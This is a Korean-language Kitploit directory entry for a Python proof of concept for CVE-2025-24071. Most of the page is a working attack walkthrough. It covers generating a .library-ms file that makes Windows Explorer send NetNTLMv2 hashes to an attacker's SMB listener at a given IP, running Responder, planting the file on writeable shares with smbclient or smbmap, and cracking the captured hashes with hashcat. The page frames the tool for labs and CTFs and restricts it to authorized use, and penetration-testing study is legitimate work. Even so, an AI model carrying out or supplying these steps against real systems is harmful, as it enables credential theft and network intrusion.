Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
PoC-CVE-2025-24071 — CVE-2025-24071에 대한 Python PoC로, .library-ms 파일을 생성하여 Windows Explorer가 SMB를 통해 NetNTLMv2 해시를 유출하도록 유도해 캡처 및 크래킹하는 도구입니다. | Kitploit
도구/GitHubGitHub/daemon-404/poc-cve-2025-24071
Password AttacksVulnerability AnalysisExploitationNetwork SecurityCTFPenetration TestingRed TeamingLabs & Practice
GitHubdaemon-404/poc-cve-2025-24071

PoC-CVE-2025-24071

CVE-2025-24071에 대한 Python PoC로, .library-ms 파일을 생성하여 Windows Explorer가 SMB를 통해 NetNTLMv2 해시를 유출하도록 유도해 캡처 및 크래킹하는 도구입니다.

저장소 보기
13시간 58분 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

❀ coerce-library

CVE-2025-24071 — .library-ms NTLM 강제 인증 (SMB / TAR 방식)

Theme: Rosé Pine Python: 3.9+ CVE: 2025-24071

Protocol: SMB Capture: NetNTLMv2 Use: Lab / CTF


❀ 기능

공격 IP와 파일 이름을 입력받아 \\<IP>\share를 가리키는 .library-ms 파일을 생성하고, 이를 exploit.tar로 묶습니다. Explorer가 해당 .library-ms 파일이 놓인 폴더를 탐색하면 UNC 경로를 자동으로 확인하고, 계정의 NTLMv2 해시를 리스너로 유출합니다 — 클릭이 필요 없습니다.

⚠️ 실제로 동작하는 것은 느슨한 .library-ms 파일이며, .tar가 아닙니다. 공유 폴더에 놓인 .tar는 아무 동작도 하지 않습니다. Explorer는 tarball을 파싱하지 않습니다. .library-ms 자체를 느슨한 파일로 공유 폴더에 올려야 합니다. 방법은 사용하는 도구에 따라 다릅니다 (아래 참조).


❀ 실행

root@kitploit:~
uv run coerce_library.py      # or: python3 coerce_library.py
root@kitploit:~
Attack IP [10.10.14.197]:
File name [documents]:
[+] documents.library-ms  ->  \\10.10.14.197\share
[+] packed into exploit.tar

❀ 이후 단계

1) 리스닝

root@kitploit:~
sudo responder -I tun0

2) 쓰기 가능한 공유 폴더에 .library-ms 올리기

smbclient — .tar를 업로드한 뒤 tar x로 서버 측에서 압축을 해제합니다 (옆에 느슨한 .library-ms가 생성됩니다):

root@kitploit:~
smbclient //<TARGET>/<SHARE> -U '<DOMAIN>/<USER>%<PASS>' -c 'put exploit.tar; tar x exploit.tar'

smbmap — 압축 해제 단계가 없으므로 느슨한 .library-ms를 직접 업로드합니다 (여기서 .tar를 업로드해도 아무 효과가 없습니다 — 압축을 풀 수 없습니다):

root@kitploit:~
smbmap -H <TARGET> -d <DOMAIN> -u <USER> -p <PASS> --upload exploit.library-ms 'IT/exploit.library-ms'

공유 폴더에 느슨한 파일로 올라갔는지 확인합니다:

root@kitploit:~
smbclient //<TARGET>/<SHARE> -U '<DOMAIN>/<USER>%<PASS>' -c 'ls' | grep library

3) 캡처한 NTLMv2 크래킹

root@kitploit:~
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

☧ 허가된 침투 테스트 / CTF / 실습 환경에서만 사용하세요 ☧

도구 다운로드